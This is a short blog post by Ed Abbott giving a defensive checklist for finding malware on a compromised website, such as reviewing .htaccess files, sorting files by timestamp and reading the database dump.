Here's a simple hierarchy that I
find helpful when looking into a
website that may have been compromised
for the purpose of spreading malware.
The first step, of course, is to
download an FTP copy of the website
to look at all the code. I'm writing
here as if you've already done that.
What next?
Once you have the entire file hierarchy
for the website on your hard drive, I'd
look for malware following these steps:
- Look for .htaccess files in the root
directory of the website and in all the
sub-directories - Study the .htaccess files. Make sure
there is no evidence of the bad guys in
these files. - Make a study of timestamps for the
website's files and directories. Under
Unix (Linux), the ls -lt command
is very useful for this purpose. Look
for recently altered files. - Study the contents of recently altered
files for evidence of the bad guys - Dump the website database and read
through it for evidence of the bad guys
Using these steps, you may have some luck
and discover very quickly how the bad guys
have compromised your website.
Here's why this is helpful:
Looking randomly for something in a large
field of possibilities is extremely time-
consuming and often brings no results.
Instead of looking randomly, use a little
imagination. Imagine how your website
might have been compromised and look in
the high-suspicion places first.
I often find it helpful to take a little
time off and let my intuition kick in.
Usually I'm better off if I have some idea
what I'm looking for when I'm trying to find
out how a website was compromised.
In other words, a highly directed search is
so much better than a totally random search.
Ed Abbott
No comments:
Post a Comment